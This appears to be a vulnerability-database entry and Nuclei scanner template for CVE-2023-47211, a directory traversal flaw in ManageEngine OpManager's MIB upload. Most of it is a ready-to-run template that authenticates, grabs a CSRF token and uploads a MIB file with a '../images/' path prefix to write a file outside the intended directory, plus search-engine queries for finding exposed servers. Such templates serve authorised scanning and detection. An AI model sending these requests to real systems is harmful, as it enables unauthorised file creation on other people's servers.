ManageEngine OpManager - Directory Traversal

2024-01-1309:35:55

ProjectDiscovery

github.com

manageengine

zoho

directory traversal

arbitrary file creation

lfi

authenticated

intrusive

cvss8.6

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

8.9 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

36.5%

JSON

A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.

id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.00164
    epss-percentile: 0.52964
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 490a0046304402207463b57de77e273b29f35ef339d53a9d18d09b98c545fbfb4a406e3f06c8ce3b0220333ec1305069fb86c3b10d5887bdf0152765f1cf7b49c2907697875e3c10563c:922c64590222798bb761d5b6d8e72950